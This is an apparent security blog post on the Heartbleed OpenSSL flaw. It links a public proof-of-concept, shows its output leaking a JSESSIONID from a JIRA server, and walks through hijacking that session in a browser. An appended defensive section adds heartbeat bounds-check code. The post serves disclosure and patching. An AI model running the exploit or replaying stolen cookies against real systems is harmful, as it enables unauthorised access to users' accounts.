The Heartbleed problem is actually worse than it currently appears (bad as it already looks). Heartbleed (CVE-2014-0160) is an OpenSSL vulnerability that lets any remote user dump part of the server's memory. Yes, it is really that bad. It is worth noting that a skilled attacker can use it to extract the RSA private key the server uses to communicate with its clients, through a more involved process. The level of knowledge and skill required to carry out such an attack is not very high, but it probably exceeds that of the average script kiddie. So why is Heartbleed worse than you think? Simple: proof-of-concept scripts are now available that allow anyone to perform session hijacking attacks against logged-in users anywhere in the world. The proof of concept that was most widely shared this morning was a simple Python script: https://gist.github.com/takeshixx/10107280. With this script, anyone in the world can dump part of the memory of a vulnerable server. Let's look at the output of this tool against a vulnerable server running the JIRA ticket-tracking system (the hexadecimal column of the output has been removed for readability):
[matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 3239
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@..GET /browse/en_US-cubysj-1988229788/6160/11/(lots of garbage)..............Accept-Encoding: gzip,deflate,sdch..Accept-Language: en-US,en;q=0.8..Cookie: atlassian.xsrf.token=BWEK-0C0G-BSN7-VOZ1|3d6d84686dc0f214d0df1779cbe94db6047b0ae5|lout; JSESSIONID=33F4094F68826284D18AA6D7ED1D554E....E.$3Z.l8.M..e5..6D7ED1D554E.........*..?.e.b..
WARNING: server returned more data than it should - server is vulnerable!
This must be a dump of memory left over from the last GET request. Notice the JSESSIONID cookie above? That is how JIRA tracks your HTTP session to determine whether you are logged in. If the system requires authentication (as this JIRA instance does), I can insert this cookie into my browser and become a legitimate user of this JIRA instance. Insert the session ID cookie into the browser. After saving the modified cookie, refresh the browser: the reloaded JIRA instance shows that we are now logged in. As shown above, once we obtain a valid session ID cookie, we can access the JIRA instance as an internal employee. The only way to detect this type of attack is to check the source address of every request. This Heartbleed vulnerability is terrible, and almost nothing stops a remote attacker from executing a session hijacking attack that bypasses authentication. Patch your systems immediately.
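The bounds check that the OpenSSL fix for CVE-2014-0160 adds is easy to state in code. The following is an added example, not code from this post or from OpenSSL: it parses a TLS heartbeat record as laid out in RFC 6520 and refuses any message whose declared payload_length does not fit inside the record, which is the same over-length condition the script's warning line above detects from the response side. The two sample records are constructed here, not captured traffic.

```python
import struct

TLS_HEARTBEAT = 24      # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16        # RFC 6520 requires at least 16 bytes of padding


def parse_tls_record(data: bytes):
    """Split one TLS record into (content_type, version, body)."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    ctype, ver, length = struct.unpack("!BHH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("record body shorter than declared length")
    return ctype, ver, body


def heartbeat_payload(body: bytes) -> bytes:
    """Return the payload a correct peer echoes, or raise when payload_length
    does not fit in the record. This is the bounds check the Heartbleed fix
    added; unpatched OpenSSL copied payload_length bytes regardless."""
    if len(body) < 3:
        raise ValueError("heartbeat message too short")
    hb_type, payload_len = body[0], struct.unpack("!H", body[1:3])[0]
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        raise ValueError("unknown heartbeat type %d" % hb_type)
    if 1 + 2 + payload_len + MIN_PADDING > len(body):
        raise ValueError("payload_length %d exceeds record body" % payload_len)
    return body[3:3 + payload_len]


def check_heartbeat(data: bytes):
    """('ok', payload) for a well-formed heartbeat record, else ('drop', why)."""
    try:
        ctype, _ver, body = parse_tls_record(data)
        if ctype != TLS_HEARTBEAT:
            return ("drop", "not a heartbeat record")
        return ("ok", heartbeat_payload(body))
    except ValueError as err:
        return ("drop", str(err))


# Constructed samples (not captured traffic). GOOD declares a 5-byte payload
# and carries it plus 16 bytes of padding. BAD declares 16384 bytes but the
# record carries only the 3-byte heartbeat header, so a patched server drops it
# instead of answering with the 16384-byte response seen above.
GOOD = b"\x18\x03\x02\x00\x18\x01\x00\x05hello" + b"\x00" * 16
BAD = b"\x18\x03\x02\x00\x03\x01\x40\x00"
```

Calling check_heartbeat(GOOD) returns ('ok', b'hello'); check_heartbeat(BAD) returns a drop with the reason naming the oversized length.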